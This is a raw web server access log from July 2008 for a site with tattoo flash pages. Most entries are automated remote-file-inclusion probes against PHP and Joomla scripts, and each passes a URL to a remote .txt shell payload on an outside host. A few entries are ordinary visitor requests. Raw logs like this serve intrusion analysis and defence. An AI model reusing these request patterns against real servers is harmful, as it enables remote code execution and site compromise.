193.207.106.54 - - [28/Jul/2008:22:27:26 -0500] "GET /logs/errors.php?error=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
193.207.106.54 - - [28/Jul/2008:22:27:26 -0500] "GET /errors.php?error=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.127.253.161 - - [28/Jul/2008:22:27:31 -0500] "GET /logs/access_log.1213142400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:28:42 -0500] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:28:42 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:28:44 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:29:51 -0500] "GET /logs/access_log.1212883200/joomla/index.php?option=com_restaurante&task=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.108.64.96 - - [28/Jul/2008:22:31:21 -0500] "GET /logs/malleating/photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
89.108.64.96 - - [28/Jul/2008:22:31:27 -0500] "GET /malleating/photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
217.20.138.101 - - [28/Jul/2008:22:34:38 -0500] "GET /logs/?sourcedir=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 200 93161 "-""libwww-perl/5.805"
217.20.138.101 - - [28/Jul/2008:22:34:38 -0500] "GET /?sourcedir=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
75.125.91.162 - - [28/Jul/2008:22:35:15 -0500] "GET /logs/access_log.1216598400/errors.php?error=http://www.boardal.com/lang/readme.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
75.125.91.162 - - [28/Jul/2008:22:35:15 -0500] "GET /errors.php?error=http://www.boardal.com/lang/readme.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
75.125.91.162 - - [28/Jul/2008:22:35:15 -0500] "GET /logs/errors.php?error=http://www.boardal.com/lang/readme.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
75.125.91.162 - - [28/Jul/2008:22:35:17 -0500] "GET /logs/access_log.1216598400/errors.php?error=http://www.boardal.com/lang/readme.txt%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
75.125.91.162 - - [28/Jul/2008:22:35:17 -0500] "GET /logs/errors.php?error=http://www.boardal.com/lang/readme.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
75.125.91.162 - - [28/Jul/2008:22:35:17 -0500] "GET /errors.php?error=http://www.boardal.com/lang/readme.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
210.245.87.117 - - [28/Jul/2008:22:36:14 -0500] "GET /logs/malleating/photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:36:15 -0500] "GET /malleating/photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
65.167.141.55 - - [28/Jul/2008:22:37:14 -0500] "GET /logs/access_log.1214092800 HTTP/1.1" 200 131072 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.108.64.96 - - [28/Jul/2008:22:37:27 -0500] "GET /logs/netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.812"
89.108.64.96 - - [28/Jul/2008:22:37:27 -0500] "GET /netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
210.245.87.117 - - [28/Jul/2008:22:38:37 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:38:37 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.191.6.148 - - [28/Jul/2008:22:38:55 -0500] "GET /logs/access_log.1207785600/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
64.191.6.148 - - [28/Jul/2008:22:38:55 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
64.191.6.148 - - [28/Jul/2008:22:38:55 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
72.52.131.56 - - [28/Jul/2008:22:41:00 -0500] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
72.52.131.56 - - [28/Jul/2008:22:41:00 -0500] "GET //contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
195.42.160.22 - - [28/Jul/2008:22:41:15 -0500] "GET /logs/phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 288 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:22:41:15 -0500] "GET /phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 283 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:22:41:17 -0500] "GET /logs/phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 288 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:22:41:18 -0500] "GET /phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 283 "-""libwww-perl/5.48"
198.65.247.206 - - [28/Jul/2008:22:42:28 -0500] "GET /logs//index.php?pagina1=http://bakazeus.t35.com/cmdtotal.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
198.65.247.206 - - [28/Jul/2008:22:42:29 -0500] "GET //index.php?pagina1=http://bakazeus.t35.com/cmdtotal.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
64.191.6.148 - - [28/Jul/2008:22:44:21 -0500] "GET /logs/access_log.1207785600/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
64.191.6.148 - - [28/Jul/2008:22:44:21 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
64.191.6.148 - - [28/Jul/2008:22:44:21 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
210.245.87.117 - - [28/Jul/2008:22:44:47 -0500] "GET /logs/elite/photoel/photoel_110.html/malleating/photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:44:48 -0500] "GET /elite/photoel/photoel_110.html/malleating/photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
64.191.6.148 - - [28/Jul/2008:22:44:49 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
69.73.188.36 - - [28/Jul/2008:22:45:12 -0500] "GET /logs/errors.php?error=? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.73.188.36 - - [28/Jul/2008:22:45:12 -0500] "GET /errors.php?error=? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
190.54.62.66 - - [28/Jul/2008:22:45:17 -0500] "GET /logs/access_log.1213315200/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
190.54.62.66 - - [28/Jul/2008:22:45:17 -0500] "GET /index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
190.54.62.66 - - [28/Jul/2008:22:45:18 -0500] "GET /logs/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:22:45:58 -0500] "GET /logs/join.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:22:45:59 -0500] "GET /join.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
74.220.163.9 - - [28/Jul/2008:22:46:14 -0500] "GET /logs/errors.php?error=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.220.163.9 - - [28/Jul/2008:22:46:14 -0500] "GET /errors.php?error=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.245.87.117 - - [28/Jul/2008:22:46:54 -0500] "GET /logs/ventallinfo/function.mysql-connect/malleating/photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:46:54 -0500] "GET /ventallinfo/function.mysql-connect/malleating/photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
195.42.160.22 - - [28/Jul/2008:22:47:24 -0500] "GET /phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 283 "-""libwww-perl/5.48"
210.245.87.117 - - [28/Jul/2008:22:47:48 -0500] "GET /logs/netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:47:49 -0500] "GET /netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
64.191.6.148 - - [28/Jul/2008:22:49:55 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
75.125.91.162 - - [28/Jul/2008:22:50:37 -0500] "GET /errors.php?error=http://www.boardal.com/lang/readme.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
75.125.91.162 - - [28/Jul/2008:22:50:37 -0500] "GET /logs/errors.php?error=http://www.boardal.com/lang/readme.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
75.125.91.162 - - [28/Jul/2008:22:50:40 -0500] "GET /logs/errors.php?error=http://www.boardal.com/lang/readme.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
75.125.91.162 - - [28/Jul/2008:22:50:40 -0500] "GET /errors.php?error=http://www.boardal.com/lang/readme.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
201.130.79.130 - - [28/Jul/2008:22:51:21 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
201.130.79.130 - - [28/Jul/2008:22:51:21 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
201.130.79.130 - - [28/Jul/2008:22:51:21 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
201.130.79.130 - - [28/Jul/2008:22:51:21 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
209.91.252.196 - - [28/Jul/2008:22:52:21 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
209.91.252.196 - - [28/Jul/2008:22:52:22 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:52:29 -0500] "GET /logs/v_all/v_2006_all/b/c//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.91.252.196 - - [28/Jul/2008:22:52:30 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:52:30 -0500] "GET /v_all/v_2006_all/b/c//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
209.91.252.196 - - [28/Jul/2008:22:52:30 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
209.97.201.148 - - [28/Jul/2008:22:53:00 -0500] "GET /logs/join.php?INCLUDE_FOLDER=http://sujianto.com/load.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:22:53:00 -0500] "GET /join.php?INCLUDE_FOLDER=http://sujianto.com/load.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
72.248.189.82 - - [28/Jul/2008:22:53:05 -0500] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:22:53:05 -0500] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:53:25 -0500] "GET /logs/netcat_files/Image/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:22:53:26 -0500] "GET /netcat_files/Image/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
59.125.211.84 - - [28/Jul/2008:22:53:38 -0500] "GET /logs/errors.php?error=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
59.125.211.84 - - [28/Jul/2008:22:53:38 -0500] "GET /errors.php?error=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
190.54.62.66 - - [28/Jul/2008:22:55:04 -0500] "GET /logs/access_log.1214438400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
190.54.62.66 - - [28/Jul/2008:22:55:05 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
190.54.62.66 - - [28/Jul/2008:22:55:06 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
75.80.45.35 - - [28/Jul/2008:22:56:05 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
75.80.45.35 - - [28/Jul/2008:22:56:05 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
75.80.45.35 - - [28/Jul/2008:22:56:05 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
75.80.45.35 - - [28/Jul/2008:22:56:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
72.248.189.82 - - [28/Jul/2008:22:56:10 -0500] "GET /logs/htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:22:56:10 -0500] "GET /htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:22:58:26 -0500] "GET //admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:22:58:26 -0500] "GET /logs//admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
190.54.62.66 - - [28/Jul/2008:22:58:53 -0500] "GET /logs/access_log.1212883200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
72.248.189.82 - - [28/Jul/2008:22:59:00 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.214.44.28 - - [28/Jul/2008:22:59:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [28/Jul/2008:22:59:03 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [28/Jul/2008:22:59:03 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [28/Jul/2008:22:59:03 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [28/Jul/2008:22:59:03 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [28/Jul/2008:22:59:03 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [28/Jul/2008:22:59:03 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
72.248.189.82 - - [28/Jul/2008:22:59:03 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
71.236.164.35 - - [28/Jul/2008:22:59:20 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:20 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:20 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
202.155.5.40 - - [28/Jul/2008:22:59:23 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
71.236.164.35 - - [28/Jul/2008:22:59:27 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:27 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:27 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:27 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:27 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:27 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:27 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:27 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:28 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:29 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:30 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:41 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:41 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
